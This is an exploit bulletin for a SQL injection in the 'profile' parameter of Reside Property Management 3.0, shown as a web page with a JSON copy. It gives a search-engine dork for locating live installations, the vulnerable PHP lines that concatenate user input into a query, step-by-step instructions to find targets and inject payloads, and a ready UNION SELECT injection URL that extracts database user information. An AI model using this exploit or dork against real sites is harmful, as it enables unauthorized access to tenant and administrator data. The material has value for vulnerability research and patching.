Search...

Reside Property Management 3.0 SQL Injection

2020-06-30T00:00:00

ID PACKETSTORM:158245
Type packetstorm
Reporter AmirMohammad Safari
Modified 2020-06-30T00:00:00

Description

                                        
                                            `# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection  
# Date: 2020-06-28  
# Google Dork: "Copyright 2020 Reside Property Management"  
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)  
# Team Members: Behzad Khalifeh , Milad Ranjbar  
# Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/  
# Version: v3.0 [Final Version]  
# Tested on: Windows/Linux  
# CVE: N/A  
  
.:: Description ::.  
RESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device.  
  
  
.:: Vulnerable File ::.  
profile.php  
  
  
.:: Vulnerable Code ::.  
- Line 21: $profile = $_GET['profile'];  
- Line 22: $adminsName = preg_replace('/-/', ' ', $profile);  
- Line 90: $sql = "SELECT * FROM admins WHERE adminName = '" . $adminsName . "'";  
- Line 91: mysqli_query $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error());  
  
  
.:: Proof Of Concept (PoC) ::.  
Step 1 - Find Your Target With the above Dork.  
Step 2 - Find profile.php File in Target  
Step 3 - Inject Your Payloads in profile parameter  
  
  
.:: Sample Request ::.  
localhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:158245", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Reside Property Management 3.0 SQL Injection", "description": "", "published": "2020-06-30T00:00:00", "modified": "2020-06-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/158245/Reside-Property-Management-3.0-SQL-Injection.html", "reporter": "AmirMohammad Safari", "references": [], "cvelist": [], "lastseen": "2020-07-01T12:47:50", "viewCount": 50, "enchantments": {"dependencies": {"references": [], "modified": "2020-07-01T12:47:50", "rev": 2}, "score": {"value": 0.6, "vector": "NONE", "modified": "2020-07-01T12:47:50", "rev": 2}, "vulnersScore": 0.6}, "sourceHref": "https://packetstormsecurity.com/files/download/158245/residepropman30-sql.txt", "sourceData": "`# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection \n# Date: 2020-06-28 \n# Google Dork: \"Copyright 2020 Reside Property Management\" \n# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari) \n# Team Members: Behzad Khalifeh , Milad Ranjbar \n# Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/ \n# Version: v3.0 [Final Version] \n# Tested on: Windows/Linux \n# CVE: N/A \n \n.:: Description ::. \nRESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device. \n \n \n.:: Vulnerable File ::. \nprofile.php \n \n \n.:: Vulnerable Code ::. \n- Line 21: $profile = $_GET['profile']; \n- Line 22: $adminsName = preg_replace('/-/', ' ', $profile); \n- Line 90: $sql = \"SELECT * FROM admins WHERE adminName = '\" . $adminsName . \"'\"; \n- Line 91: mysqli_query $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error()); \n \n \n.:: Proof Of Concept (PoC) ::. \nStep 1 - Find Your Target With the above Dork. \nStep 2 - Find profile.php File in Target \nStep 3 - Inject Your Payloads in profile parameter \n \n \n.:: Sample Request ::. \nlocalhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23 \n \n`\n"}